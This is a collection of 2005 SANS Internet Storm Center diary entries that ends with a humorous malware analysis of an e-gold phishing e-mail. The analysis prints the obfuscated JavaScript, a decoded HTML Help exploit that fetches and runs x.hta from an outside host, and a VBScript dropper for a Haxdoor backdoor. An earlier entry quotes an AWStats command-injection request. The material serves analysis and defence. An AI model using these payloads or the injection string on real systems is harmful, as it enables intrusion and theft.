Misc. Items
- Thanks for all the feedback on my spyware report.
- ISC Handler Pedro Bueno has put up the answers to his malware analysis quiz and posted a new quiz on his handler webpage. Check it out.
Snort 2.4.2 Released
* Fixed crash bug with -T and default logging setup, first reported by Zultan.
* Corrected Win32 directory setup for new WinPCAP.
Over $24 Billion at Risk of Theft from Spyware in the US Alone
This is my own estimate, and you can look at the methodology here. Essentially I took the infection rate of "system monitor" spyware (the kind with keyloggers that grab bank account and credit card information), the percentage of people who bank and shop online, and the average balance on bank accounts and credit cards, and came up with over $24 billion in assets and credit that can be leveraged by "hostile entities" today. I believe this number is an underestimate. It does not include accounts stolen via phishing, online merchants who simply take the information you give them, or other social engineering attacks.
This is a draft analysis (complete with typos, bad grammar, and probably broken HTML) and comments are welcome to bambenek -at- gmail.com.
More on Outlook Anti-Phishing Feature
Also as mentioned here:
http://blogs.washingtonpost.com/securityfix/2005/09/microsoft_issue.html
The Outlook update listed in the New Microsoft Updates ISC story adds a new feature by default which is highlighted here:
Thanks to fellow handler Lenny Zeltser for testing and the screenshot.
Still waiting on specific details and test results.
New Microsoft Updates
Here's a blurb and some links in case you missed it.
Microsoft Office 2003 SP2 Released
http://support.microsoft.com/kb/887616
Security bulletins that are associated with the service pack
MS05-023/KB890169: Vulnerabilities in Microsoft Word could lead to remote code execution
MS04-027/KB884933: Vulnerability in WordPerfect converter could allow code execution
MS04-028/KB833987: Buffer overrun in JPEG processing (GDI+) could allow code execution
Microsoft Visio 2003 SP2 Released
http://support.microsoft.com/kb/887616
Security bulletins that are associated with the service pack
MS04-028/KB833987: Buffer overrun in JPEG processing (GDI+) could allow code execution
http://support.microsoft.com/kb/904631
This update should improve your junk mail filtering accuracy.
Potential New AOL Chat Virus
Details are sketchy so far, but we have the following thanks to Alan and Chris.
McAfee deletes the virus, but every time the user logs off and back onto the system it regenerates the batch file.
The user gets a chat message via AOL: "Checkout this JPEG" with a link.
After clicking the link, it sends itself to everyone on their buddy list and creates the file C:\xz.bat
Contents of the file: it is set to disable MS security and the firewall.
It creates 3 registry entries, one of which is a service:
Hkey_local_machine\Software\Microsoft\Windows\CurrentVersion\Run
    Name: Strtax, Data: lock.exe (Delete)
Hkey_local_machine\Software\Microsoft\Windows\CurrentVersion\RunServices
    Name: Strtax, Data: lock.exe (Delete)
Hkey_User\Software\Microsoft\Windows\CurrentVersion\RunServices
    Name: Strtax, Data: lock.exe (Delete)
After deleting those three keys and a reboot the xz.bat file stopped trying to reload itself.
If you have a copy of xz.bat or lock.exe, please submit it using the contact form at http://isc.sans.org/contact.php
Errata, Mea Culpa, "latest", "Date released" and "Date Published"
"Release date", "Date Published" and "latest", as used by MS on their "Download Center" and in their "Microsoft Download Notifications" email service, are useless for determining currency. Take the additional step of checking the digital signature dates, do some more research, and you'll know whether the downloads are needed in your environment.
Reader clue submission:
We had some posts pointing out that these were not "new" items; one submission (they requested anonymity) said it best:
"1. The IE6 SP1 for non-XP SP2 systems that you say is new... the file date & time may well be, but the digital signature date for the file that I downloaded from that link says it was signed on May 3rd 2004!!! So it's an old one.
Maybe the file date was modified on the download server, but the signature says otherwise.
2. Same with the DX8 file... this one is even older: the digital signature says it was created on August 8th 2003, even older!
Please check the digital signatures in the future before posting announcements."
Thank you "anonymous", next time I'll be sure to remember that.
Exculpatory information
Microsoft's Download Center's "Release Date" for the Diary items said:
"Internet Explorer 6 Service Pack 1 Release date 9/21/2005" and "Security Fix for DirectX 8 (KB819696) Release date 9/22/2005".
When you click the download link for the details of each Download Center item, the download "Date Published" information says:
"Internet Explorer 6 Service Pack 1 Date Published: 9/22/2005" and goes on to say:
"Quick Description:
Internet Explorer 6 is the set of core Web browsing technologies in Windows XP. These core technologies have recently been updated as part of Windows XP Service Pack 2 (SP2) with Advanced Security Technologies". And I assumed (I know...) that MS had updated IE running on XP SP1 with the IE XP SP2 security technology... No other clueful information there.
Moving on, the "Security Fix for DirectX 8 on Windows 2000, Windows ME, Windows 98 SE, and Windows 98 (KB819696)" says "Date Published: 9/22/2005". Again, there's no other clueful information there.
On "Latest" and "Published"
In addition, when you receive the "Microsoft Download Notifications" email (in this case dated September 23, 2005) and click its links for the "latest", you get the same dates as above. The "Notifications" email is "a free weekly mailing that provides you with the latest drivers, trial software, service packs, and other downloads from the Microsoft Download Center. Listed below are downloads published in the Download Center in the past week, in the categories that you have chosen*".
In summary, "Date released", "Date Published" and "latest" have nothing to do with currency.
I did contact MS about this but I'm having problems understanding where to go from here. Encyclopedia? Susan Bradley, ( ; ^ ) Susan!
Other:
"Release date" use:
"Earnings Release Date Set"
http://moneycentral.msn.com/investor/alerts/glossary.asp?TermID=2
"Date Published"
http://www.cgpublisher.com/CGOntology/CGDatePublished
Patrick Nolan ( ; ^ )
Possible New Zero-Day Exploit for Realplayer
Helix Player 1.0.5 Gold and prior (Linux)
RealPlayer 10.0.5 Gold and prior (Linux)
There is no known fix at this time. http://service.real.com/help/faq/security/ has not posted information on this yet.
Blake Hartstein from demarc.com posted the following to Bleeding-Snort yesterday, which should provide coverage for this issue:
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any \
  (msg:"BLEEDING-EDGE RealPlayer/Helix Player Format String Exploit"; \
  flow:established,from_server; content:"<image"; \
  pcre:"/<image\s+[^>]*handle=[^>]*%[^>]*%/iG"; \
  reference:url,milw0rm.com/id.php?id=1232; reference:bugtraq,14945;)
Stay tuned for further updates as we have them.
New Handler Pages Are Here!
AWSTATS
GET //awstats.pl?configdir=|echo
Also, see the diary by fellow handler Erik Fichtner dated August 29, 2005 for more on this.
'Pump and Dump' Spam Messages
Just a quick note for everyone as you return to the office on Monday morning. There have been a few reports of a new spam message that has been thrown out on the net over the weekend and that will have security implications for some. 'Pump and Dump' spam messages are emails that appear to give the reader an insider's edge on a particular stock that is about to see some amazing growth. The people behind the spam have undoubtedly bought many shares of the stock ahead of time and will dump them after unsuspecting users push the price up with their purchases. This type of spam has been around for a while, and usually doesn't make it to my inbox that often. However, since Saturday morning I have had upwards of 100 reach one of my older email addresses, and many more have been sent in to the postmaster and abuse addresses.
However, upon looking closely at the headers and taking a very high-level view, this appears to be related to exploitation of some type of CGI or PHP application. After exploitation, the attacker can proxy or otherwise relay their junk mail. Unfortunately, I have not been able to get close enough to one of these relay machines to determine precisely what application has come under fire.
So, if you find that your company has had a large uptick in `pump and dump' spams, know that you are not the only ones. If you find webserver logs, or better yet, an actual compromised host that was sending out this junk, then please let us know what application it is that is being exploited.
[Update - 20050926 - 2000 UTC]
There are several theories about how the spam was being sent out. Most of them revolve around a set of zombies that were targeted at a set of domains and email addresses. How exactly, we still don't know, and we hope that one of the domains that actually was exploited will look through their logs or other audit sources to help shed light on this.
With that said, there is a very interesting graph involving the stock of the company being spammed about. Take a look at the Yahoo Finance website for TOTG. The company in the past several days has had very small volume and little fluctuation in its price. The historical records show this as well, with the exception of September 12th: 1.2 million shares exchanging hands, which is what pumped the stock out of the ~40-60 cent range into the dollar range. For future viewers, I am saving

Judging by what I am seeing, it appears that there are a lot of greedy people out there who are willing to listen to "insider information" sent to them in spam. NOTE: I am not saying anything about the 2-Track Global corporation. It is my opinion that, until someone within the company is found to have done something fraudulent, they are a bunch of good guys who have become the victims of this activity. I have forwarded copies of some of the emails to the SEC for their follow-up, and I hope that they are able to follow the money to the real criminal(s).
Scott Fendley
ISC Handler
IE 6 SP1 and Direct X downloads
There are two new downloads from Microsoft with publish dates of last week.
The first is Internet Explorer 6 SP1, for systems that are not XP SP2. Not a lot of detail or documentation available on this yet. It shows a publish date of 21 Sept 2005.
http://www.microsoft.com/downloads/details.aspx?FamilyID=1e1550cb-5e5d-48f5-b02b-20b602228de6&DisplayLang=en
The second is an updated Security Fix for DirectX 8 on Windows 2000, Windows ME, Windows 98 SE, and Windows 98. The KB article does not appear to have been updated, but the download has a publish date of 22 Sept 2005. The original advisory was MS03-030.
http://www.microsoft.com/downloads/details.aspx?FamilyID=49552d6a-4a62-48ba-a2ac-0b237cd5f732&DisplayLang=en
Cheers,
Adrien
SANS Internet Storm Center Handler of the day
Zen approach to backups
Now I am no expert on zen. I don't know anyone who is, and I don't play a zen master on TV. I do have some experience with data backups, and quite a bit attempting to do restores. Note the key word attempt. A number of times I have asked clients for their most recent backup tapes, only to realize that they are blank, too old, the tapes are damaged, the tapes are 30 KM away, or they did not back up the data they intended to.
What is zen anyway? One way to think of zen is that it is an approach to the journey of life. You become more aware of the journey as it happens, as well as the things and people around you. Zen is about those things that are within you, and interacting with your environment.
So how does zen have anything to do with data backups? Backups are one of those things we really know we should do. I have often said that there are only three rules to using computers. The first is to plan on doing backups. The second is actually doing the backups, and the third is to test those pesky backups to make sure they actually worked. It is funny that number three is the step we seem to miss out on the most. Not to pick on the number three, it should not feel left out, almost as many people fail to do number one or number two.
One of the interesting things about data is that it is actually constantly moving. It doesn't just lie there, you can only take snapshots in time. A good analogy is that data can be like water. The picture of how it looks at one point might not relate at all to how it looks later. You can take great care to contain the water, but it can also go stale, or the storage container can go bad as well. Having multiple copies of the data doesn't guarantee that they are the same at all. In approaching zen backup guru-hood you are unfortunately only as good as the last known good backup that you can restore.
What is data? Well one way of looking at it is all that stuff you would rather not lose. All that stuff that should be backed up, that is your data grasshopper. One of the funny (well not really) things about data is the more of it you have lost over time, the better you get at backups! You can learn wisdom through data loss grasshopper.
Let's face it, working with computers can be interesting, fun, infuriating, frustrating, and educational. All at the same time. No matter how you feel about them, most of us keep rather important stuff on our computers. Think carefully and approach awareness of the value of the data on computers, both those at home and those at work. Realize the tragedy of complete loss of that data, let it permeate your being. Sense the power of a proper tested backup, the joy of being able to restore that data. Meditate and happily hum along with your favorite backup software and hardware. Place your backup media with reverence in its place of safety.
If you fail in these steps along the path to zen backups, have no worry. Really, was the data truly yours to begin with? If there is no sign of that data, who is to say it existed in the first place?
A reader mentioned that this story reminded him of a site he read a while back:
http://taobackup.com/
(Thanks Dan!)
Cheers,
Adrien de Beaupré
Handler of the day
http://www.cinnabar.ca/
No more Bagel, Bagle, Beagle
I knew this was coming but did not realize they were this close to implementation.
US-CERT, the U.S. Computer Emergency Readiness Team, will begin issuing uniform names for computer viruses, worms and other malicious code next month, as part of a program called the Common Malware Enumeration initiative.
http://www.eweek.com/article2/0,1895,1862266,00.asp
To malware fighters, researchers, and many others this will be a very good thing.
There will be some issues but it will make my job easier.
Patch Mozilla ASAP
http://www.informationweek.com/story/showArticle.jhtml?articleID=171200310
Cisco IOS Firewall vulnerability update.
http://www.cisco.com/en/US/products/products_security_advisory09186a00805117cb.shtml#software
Revision 1.1
2005-September-22
Added 12.2SG, 12.2SEC, and 12.2SXF releases to Software Version and Fixes
FinCen quicknews hacked
The “FinCEN QuikNews” system, a subscriber-based e-mail service that is part of the Financial Crimes Enforcement Network’s public website and is hosted externally, appears to have been compromised this morning. We are investigating this incident. This system resides outside FinCEN’s security perimeter and is not connected to any other FinCEN systems. Bank Secrecy Act data, and all other sensitive information maintained by FinCEN, was in no way, shape or form compromised by this incident.
To read the rest, go to http://www.fincen.gov/quiknews_statement.pdf
New Handler: Mohammed Haron
Mohammed is currently working for Intel Corp. in Penang, Malaysia. His duties at Intel include a wide array of security responsibilities from IDS to Forensics. He holds a GIAC GSEC and GCIA certification, and has been a local mentor for both.
His interest in security got jump-started by a group of Brazilian hackers defacing his personal web site (gr33tz to P3dr0).
Winners of Bonus Points from Yesterday’s FTBM
Yesterday, Tom Liston posted his latest Follow the Bouncing Malware. In it, he posed a question for extra credit, namely:
"Those of you with taped, horn-rimmed glasses who were in the AV club in Jr. High will note that the numbers assigned to o(0) look strangely familiar. [They were 4d5a] They're the hex equivalents of the "magic values" that begin every program on the PC (extra-credit: anyone know what they stand for?)."
We had several readers point out the answer, but the first was Frank Knobbe:
"Actually, it is every MSDOS program. Every Portable Executable (PE) file starts with a header. The first two bytes are a 'magic' that identifies the file as an MSDOS executable. The magic is 0x5A4D, which is MZ in ASCII. MZ are the initials of Mark Zbikowski, one of the original architects of MS-DOS. :)"
Tom described this as the ultimate in vanity-license-plate equivalents for geeks. Indeed it is. And, I might point out that the file encryption solution built into modern Windows systems is called….
Signing out—
Edward Frank Skoudis
Intelguardians, www.intelguardians.com
Speaking of Said Upgrades… Firefox 1.0.7
The latest version of Firefox is available, including some important security fixes. Get it here. This one fixes a few big security issues, including MFSA 2005-57, IDN heap overrun using soft-hyphens.
Korean Mozilla and Thunderbird Distro Site Woes
Update: According to information we've received (thanks, Roel!), Korean versions of Mozilla and Thunderbird distributed through **official** Mozilla FTP sites were also infected. So, if you use Korean Mozilla or Thunderbird, and downloaded the latest versions of thunderbird or mozilla, you may have been compromised. I suggest a good file integrity check, and perhaps a reinstall of your operating system and apps. Thanks again, Roel, for the clarification.
Wi-Fi Worm Rumors
Hurricane Katrina Follow-UP
Got this message from some fine folks at DHS:
"In responding to recent natural disasters and states of emergency due to Hurricane Katrina, and now Rita, the DHS US-CERT in collaboration with the Control Systems Security Center (CSSC) has released a Hurricane Katrina Control System Assistance Informational Paper. The US-CERT Control Systems Security Center (CSSC) has placed this informational bulletin here. Please go to this site and click on the link under reports for "Hurricane Katrina Control Systems Assistance (PDF)."
This paper describes how to get physical and electronic operations back on-line in a time of crisis.
Hurricane Rita Scams ALREADY!
Sadly, Hurricane Rita charity scams have already started. Several handlers at the ISC, including Tom Liston and Johannes Ullrich, are working with others, such as US-CERT, on coming up with lists of scam sites.
Watch the diary over the next few days for such a list. Also, if you find a bogus-looking "charity", feel free to report it to us at handlers-rita@sans.org or to US-CERT at soc@us-cert.gov.
Also, you may want to check out our collaborative reporting system to help sort out bogus sites posing as hurricane charities.
Update 
Due to an initiative born from the 'mwp' list, a number of domain name registrars, anti-phishing and anti-spam groups, and national CERTs are working together to have these sites closed down as fast as possible.
The Red Cross has set up a special email address for reporting suspicious sites: fraudalert@usa.redcross.org
Also, here is a current list of the Red Cross's official donation sites:
http://www.redcross.org/sponsors/donationsites/official_donation_sites.html
You can of course just go to http://www.redcross.org as the starting page if you wish to give to the American Red Cross. That is probably the safest method.
Follow the Bouncing Malware IX: eGOLDFINGER
The Spy Who Bugged Me
Cigarette smoke hung around the lampshade like a bad memory and the watery light from the low wattage bulb made the cheap coffeehouse tabletop look somehow cheaper. It was late afternoon and, as I relaxed back into the leather of the booth's seat and took a long, slow draw on my double-mocha latte with extra whipped cream, I gave the little barista hottie my most smoldering "come hither" look. No one was more surprised than me when she actually came hither. "Look, Mister," she began, snapping her gum seductively; "you can't just sit here all afternoon nursing one lousy cup of coffee. You have to buy something."
She wanted me. It was obvious.
And why not? All women want me, for I am Sixpack... Joe Sixpack, Agent 008.
[Insert long, surreal opening credit sequence, with scantily clad models prancing about to '60s music, while seductively caressing handguns.]
[Nope... nothin' Freudian about that...]
Careful not to blow my cover story (a middle-aged, balding, overweight insurance salesman on a junket to the home-office in Duluth, MN for training) I dialed back on "suave and debonair" to better fit the part:
"Uh... Look, uh... I'm from out of town and my wife only gave me so much money to spend each day... and she'll be really mad if I..."
"Buy something or get out. You can't just come in here and sit at our tables and use the free wireless all afternoon. You have to buy something."
"Look, this isn't even my laptop. I borrowed it from my boss. He told me that I..."
"Are you going to buy something, or do I have to call the cops?"
"Ok. Fine. I'll order something. What's the cheapest thing you sell?"
Both the way she rolls her eyes, and her long, drawn-out sigh scream "I want you." She can barely contain herself as she takes my order for a kid-sized fruit punch. I sense a shiver of ecstasy run through her body when, as she is walking back to the counter, I add "Shaken, not stirred."
I return my attention to the matter at hand. The evil minions of SPECTRE have hidden several explosive devices within a grid conveniently displayed on the "borrowed" laptop's screen. It is my mission to find out where they are and mark them. It is a delicate task, but Joe Sixpack, Agent 008, is up to the challenge.
Just as I was poised to place a flag marking the position of another of the explosive devices, a small voice speaks to me.
Every secret agent counted on that small, still voice inside to warn them when something wasn't right... when danger lurked nearby. But this wasn't that voice. This was an inane, stupidly-chipper voice that said "You've got mail!" in a tone normally reserved for saying things like "You've won a Nobel Prize."
"Hey, Mr. Trump, you've got mail," said the sultry coffee-serving wench, undressing me with her eyes as she placed my cup of DomJuicyJuice on the table next to me. "I don't suppose you'll be ordering anything else..."
"Only later tonight, when I have you in my bed," I think to myself while quickly saying "No."
At the bottom of the screen, in the System Tray, there is a little red envelope flashing at me: obviously, a new, Top Secret, Eyes-Only message. I glance around, acting, for all who might be watching, exactly like some guy who was about to open the email program that his boss accidentally left running on his borrowed laptop.
The place is empty, except for me and my hunka-hunka-burnin' barista love, but you can never be too careful. A double-click on the envelope brings up the Ultra Top Secret Messaging Interface, cleverly disguised as an outdated version of Outlook Express.
At the top of the screen, I see the new message. In bold, the subject reads: "Notification of e-gold account update."
I clear my throat, a few dozen times, and casually say "Yep... those e-gold folks. What a pain they are... constantly after me about updating my account information. It just never ends..."
Obviously left speechless in the presence of such a worldly yet attractive member of the opposite sex, my scalding-hot coffee-girl can only make a loud, yet feminine, snorting noise.
"I thought you said that the laptop belonged to your boss."
"Did I? Uh... no. No. It's mine. All mine. One of several that I own, in fact," I stammer. As if to prove my point, I double-click on the email, opening it.
The email itself is pretty much of a disappointment: no text, no nothing. It was probably just some sort of mistake. For a moment, I think I see some strange flashing of windows, but I'm suddenly distracted as my Caffeine-Queen speaks:
"Why did you say that?" she asks.
"Say what?"
"You know... the stuff about e-gold and owning a bunch of laptops. Why did you say that? Are you trying to impress me or something? Do you think that you can walk your bland chubby middle-aged self in here, order the cheapest thing on the menu so you can use our wireless, and then toss out some bull about owning gold and laptops and impress me?"
"I was only trying to make conversation..." I explain.
"Well don't," she says, looking suddenly like some evil arch-villain. "I don't expect you to talk, Mr. Bland... I expect you to buy."
From Russia With Love
While Agent 008 might have thought the email that he opened was a "disappointment," like any good spy thriller, there was a lot more going on behind the scenes. While there wasn't any text to the email, it did deliver a top secret message. Hidden within the email was the following JavaScript:
<html><script>var a=' <edited>';
var e=256,x=0,o="",t=new Array(4113),s="Ñ<style>#Ñx2<edited>";
function g(s,f){if(s.length<=x)return e;
else{if(f){return s.charAt(x++);}else{return a.indexOf(s.charAt(x++));
}}}function d(){var i,j,k,c,r=4078,l=0,os="",ar,ic=0;ar=new Array();
for(i=0;i<4078;i++)t[i]=" ";for(;;){if(((l>>=1)&256)==0)
{if((c=g(s,0))==e)break;l=c|65280;}if(l&1){if((c=g(s,1))==e)break;
os+=c;t[r++]=c;r&=4095;}else{if((i=g(s,0))==e)break;
if((j=g(s,0))==e)break;i|=((j&240)<<4);j=(j&15)+2;
for(k=0;k<=j;k++){c=t[(i+k)&4095];os+=c;t[r++]=c;r&=4095;}}
if(os.length>80){ar[ic++]=os;os="";}}o=ar.join("")+os;}d();
document.writeln(o);document.close();
</script></head><body
onLoad='window.status="<edited> ."'>
</body></html>
Note: several of the character strings have been <edited> as indicated.
Several FTBMs ago, kindly ol' doctor Tom told you how to deal with encoded JavaScript like this. I showed you a very Zen-like technique that used the script itself to do the decoding for you. Well... forget it. I now have an even easier way to show you, so sit back and take notes as Dr. Tom shows you how to mess up a malware author's day.
Doctor! No!
The technique I described before used a FileSystemObject to create a text file that contained the dumped output of the obfuscated JavaScript. Doing that was rather a pain, required that you edit the JavaScript in several places and... well, let's just stick with "it was a pain." Here's a much easier way. Look through the JavaScript and find where it is that they're actually dumping the results of their decoding function back into the document. It'll most likely be a call to either document.write() or document.writeln(). What is happening is that the JavaScript is actually writing the new, decoded HTML / JavaScript back into the live document so it can be interpreted by your browser's parser on the fly. What we want to do is find a way to short-circuit that parsing and allow the results to be displayed rather than interpreted by the browser. The easiest way to do that is to have the decoded output displayed by an HTML construct called a <textarea>.
In the above code, this can be accomplished by putting the following before the call to document.writeln(o):
document.write("<textarea cols=100 rows=100>");
and the following immediately after:
document.write("</textarea>");
You then fire off the resulting JavaScript in a browser, and it will display the code that it would've normally interpreted. And just-like-that, someone's hard work to obfuscate their code falls apart.
Note: Never, ever, ever, ever do this on a "live" production machine. Only ever play with malware on an isolated lab machine that you're ready, willing, and able to reformat at the drop of a hat. Remember: if you mess up, I'll send sharks with frickin' laser beams on their heads over to get you.
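An added example, not part of Tom's write-up: the decoder d() above ported to Python, so the payload can be unpacked offline without ever handing it to a browser. The 256-symbol alphabet, the greedy encoder and the sample text are all constructed here (the real alphabet string `a` is <edited> in the sample); the encoder exists only so the port can be exercised end to end.

```python
# Constructed for this example: a 256-symbol alphabet standing in for the
# <edited> string `a` of the sample; alphabet.index(ch) plays a.indexOf().
ALPHABET = "".join(chr((i * 101 + 17) % 256) for i in range(256))

RING = 4096    # ring buffer size (r &= 4095 in the original)
START = 4078   # initial write position (r=4078 in the original)
END = 256      # sentinel g() returns once the input string is exhausted


def lz_decode(s: str, alphabet: str = ALPHABET) -> str:
    """Port of d(): LZSS over a 4096-slot ring, 3..18 character matches.
    Flag bytes and (offset, length) pairs are alphabet-encoded, literals are
    raw.  All slots start as spaces here; the JS leaves 4078..4095 undefined."""
    t = [" "] * RING
    r, l, x = START, 0, 0
    out = []

    def g(literal: bool):
        nonlocal x
        if x >= len(s):
            return END
        ch = s[x]
        x += 1
        return ch if literal else alphabet.index(ch)

    while True:
        l >>= 1
        if (l & 256) == 0:            # eight flags used up: fetch a new byte
            c = g(False)
            if c == END:
                break
            l = c | 0xFF00            # the high bits count the eight shifts
        if l & 1:                     # flag 1: one literal character
            c = g(True)
            if c == END:
                break
            out.append(c)
            t[r] = c
            r = (r + 1) & (RING - 1)
        else:                         # flag 0: copy from the ring
            i = g(False)
            if i == END:
                break
            j = g(False)
            if j == END:
                break
            i |= (j & 0xF0) << 4      # 12-bit ring offset
            j = (j & 0x0F) + 2        # loop runs j+1 = 3..18 times
            for k in range(j + 1):
                c = t[(i + k) & (RING - 1)]
                out.append(c)
                t[r] = c
                r = (r + 1) & (RING - 1)
    return "".join(out)


def lz_encode(text: str, alphabet: str = ALPHABET) -> str:
    """Greedy encoder for the same format (constructed; the attacker's
    encoder is not on the page) so the decoder can be tested end to end."""
    t = [" "] * RING
    r, pos, out = START, 0, []
    while pos < len(text):
        flags, items = 0, []
        for bit in range(8):
            if pos >= len(text):
                break
            best_len, best_off = 0, 0
            for off in range(RING):
                # never let a match read a slot it overwrites while copying
                d = (off - r) & (RING - 1)
                limit = min(18, RING - d, len(text) - pos)
                n = 0
                while n < limit and t[(off + n) & (RING - 1)] == text[pos + n]:
                    n += 1
                if n > best_len:
                    best_len, best_off = n, off
            if best_len >= 3:
                items.append(alphabet[best_off & 0xFF])
                items.append(alphabet[((best_off >> 8) << 4) | (best_len - 3)])
                chunk = text[pos:pos + best_len]
            else:
                flags |= 1 << bit
                chunk = text[pos]
                items.append(chunk)
            for ch in chunk:          # mirror the decoder's ring writes
                t[r] = ch
                r = (r + 1) & (RING - 1)
            pos += len(chunk)
        out.append(alphabet[flags])
        out.extend(items)
    return "".join(out)


# Constructed sample: repetitive markup like the decoded payload, twice over.
SAMPLE = ('<style>#x2,#x3{position:absolute;left:-1000;}</style>'
          '<OBJECT id=x2 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>'
          '<PARAM NAME="Command" VALUE="Related Topics"></OBJECT>') * 2

if __name__ == "__main__":
    packed = lz_encode(SAMPLE)
    print(len(SAMPLE), "->", len(packed), "round trip:", lz_decode(packed) == SAMPLE)
```

Against a real sample, paste the alphabet string `a` and the data string `s` from the script into lz_decode in place of the constructed values.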
Doing that, we find that the obfuscated stuff is actually:
<style>#x2,#x3{position:absolute;left:-1000;}</style>
<OBJECT id=x2 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>
<PARAM NAME="Command" VALUE="Related Topics">
<PARAM NAME="Button" VALUE="Text:">
<PARAM NAME="Window" VALUE="$global_blank">
<param name="Scrollbars" value="true">
<PARAM NAME="Item1"
VALUE="command;ms-its:icwdial.chm::/icw_overview.htm">
</OBJECT>
<script>x2.HHClick();</script>
<OBJECT id=x3 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>
<PARAM NAME="Command" VALUE="Related Topics">
<PARAM NAME="Button" VALUE="Text:">
<PARAM NAME="Window" VALUE="$global_blank">
<PARAM NAME="Item1" VALUE="command;javascript:document.links[0].href='
EXEC=,mshta,http://www.date4me2.com/images/x.hta CHM=ieshared.chm
FILE=app_install.htm'%3Bdocument.links[0].click();">
</OBJECT>
<script>setTimeout('x3.HHClick();',1000);setTimeout('window.close();',1200);
</script>
</html>
This is an exploit aimed at a vulnerability in HTML Help (patched by MS05-001) that can be used to execute arbitrary code. In this case, it attempts to download and launch another HTML file called x.hta.
License To Kill
The file x.hta looks like a very much larger version of the original email message, re-using much of the same code found at the end of the JavaScript and replacing only the information in the variables. Decoding is done in the same manner as before, and results in the following:
<HTML><HEAD>
<TITLE>Microsoft Update Wizard</TITLE>
<HTA:APPLICATION id=MSUpdate
APPLICATIONNAME="Microsoft Update"
SHOWINTASKBAR=NO
CAPTION=YES
SINGLEINSTANCE=YES
MAXIMIZEBUTTON=NO
MINIMIZEBUTTON=NO
WINDOWSTATE=MINIMIZE
/></HEAD>
<OBJECT id="MSmedia" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></OBJECT>
<OBJECT id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></OBJECT>
<BODY><NOSCRIPT>To display this page you need a browser with JavaScript support.</NOSCRIPT>
<SCRIPT language="VBScript">
self.MoveTo 6000,6000
Dim IESetup
Dim o(788)
o(0)="4d5a00<edited>"
o(1)="000040<edited>"
.
.
.
783 lines removed...
.
.
.
o(786)="e8564e<edited>"
o(787)="5a6f37<edited>"
set wshProcEnv=MSplay.environment("process")
f=wshProcEnv("TEMP") + "msdtc.exe"
set IESetup=MSmedia.CreateTextFile(f, TRUE)
For j=0 To 787
o_Size=Len(o(j))
For k=1 To (o_Size-1) Step 2
Exe_Byte=Mid(o(j),k,2)
Exe_Byte="&H"+Exe_Byte
IESetup.Write(Chr(Exe_Byte))
Next
Next
IESetup.Close()
MSplay.Run(f),1,TRUE
MSmedia.DeleteFile(f)
self.Close
</SCRIPT>
</BODY></HTML>
Those of you with taped, horn-rimmed glasses who were in the AV club in Jr. High will note that the numbers assigned to o(0) look strangely familiar. They're the hex equivalents of the "magic values" that begin every program on the PC (extra-credit: anyone know what they stand for?).
Yep, the decoded script is simply building a Win32 executable out of whole cloth, i.e. it is simply writing out an executable binary based on hex values stored in an array in the source code. If we remove these lines (which launch and then delete the file...):
MSplay.Run(f),1,TRUE
MSmedia.DeleteFile(f)
and load the HTML in a browser, we end up with the file "msdtc.exe" wherever we have "TEMP" assigned.
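As an added example (not from the diary), the same reconstruction done in Python instead of by loading the HTA: the o(N)="..." hex chunks are collected, checked for gaps, written out as bytes, and then triaged for the 4d5a MZ magic and the PE signature. The sample HTA text is constructed here; x.hta itself is not on the page.

```python
import re
import struct

# The o(N)="<hex>" assignments that carry the embedded binary.
ASSIGN = re.compile(r'o\((\d+)\)\s*=\s*"([0-9A-Fa-f]*)"')


def carve_hex_array(hta_source: str) -> bytes:
    """Rebuild the dropped file from the o() array without running the HTA:
    the same two-hex-digits-per-byte walk as the VBScript loop, minus Run()."""
    chunks = {}
    for m in ASSIGN.finditer(hta_source):
        idx, hexdata = int(m.group(1)), m.group(2)
        if idx in chunks:
            raise ValueError(f"o({idx}) is assigned twice")
        if len(hexdata) % 2:
            raise ValueError(f"o({idx}) has an odd number of hex digits")
        chunks[idx] = hexdata
    if not chunks:
        raise ValueError("no o(N) assignments found")
    missing = [i for i in range(max(chunks) + 1) if i not in chunks]
    if missing:
        raise ValueError(f"array is not contiguous, o({missing[0]}) is missing")
    return bytes.fromhex("".join(chunks[i] for i in range(max(chunks) + 1)))


def describe_pe(blob: bytes) -> dict:
    """Cheap triage of the carved bytes: MZ magic, e_lfanew, PE signature."""
    info = {"size": len(blob), "mz": blob[:2] == b"MZ", "pe": False, "e_lfanew": None}
    if info["mz"] and len(blob) >= 0x40:
        (e_lfanew,) = struct.unpack_from("<I", blob, 0x3C)
        info["e_lfanew"] = e_lfanew
        info["pe"] = blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"
    return info


# Constructed stand-in for x.hta: a 64-byte DOS header whose e_lfanew points
# at a bare PE signature, split across o() entries like the real script.
_DOS = bytearray(0x40)
_DOS[0:2] = b"MZ"
struct.pack_into("<I", _DOS, 0x3C, 0x40)
_HEX = (bytes(_DOS) + b"PE\x00\x00" + b"\x00" * 20).hex()
SAMPLE_HTA = "\n".join(
    ['<SCRIPT language="VBScript">', "Dim o(2)"]
    + [f'o({i})="{_HEX[j:j + 60]}"' for i, j in enumerate(range(0, len(_HEX), 60))]
    + ["</SCRIPT>"])

if __name__ == "__main__":
    carved = carve_hex_array(SAMPLE_HTA)
    print(describe_pe(carved))   # {'size': 88, 'mz': True, 'pe': True, 'e_lfanew': 64}
```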
The file msdtc.exe is a 50,425 byte long FSG-packed Win32 executable that is chock full o'Evil. (Note: that is evil with a capital "E"). It is recognized, by several antivirus products, as Haxdoor.DW, and categorized as a Trojan/Backdoor.
A View To A Kill
Launching msdtc.exe on a test box results in no visible action (beyond a blinking drive light... hmmm...). Monitoring the action of the software tells us that it installs the following files:
C:\WINDOWS\system32\avpx32.dll
C:\WINDOWS\system32\qz.dll
C:\WINDOWS\system32\avpx64.sys
C:\WINDOWS\system32\qz.sys
C:\WINDOWS\system32\avpx32.sys
C:\WINDOWS\system32\qy.sys
C:\WINDOWS\System32\ps.a3d
It also appeared to copy the Windows SAM information to a file called SSL.
The funny thing is, when I went to look for those files on my test machine, they weren't there. Huh, I thought... I *know* that they were created...
Hmmm... a mystery.
The ".sys" ending of some of those files was my first clue. Files with the .sys extension are generally drivers on Windows, and so it would appear that what we have here is (rather than a failure to communicate) a Win32 rootkit-like entity that is hiding the existence of these files.
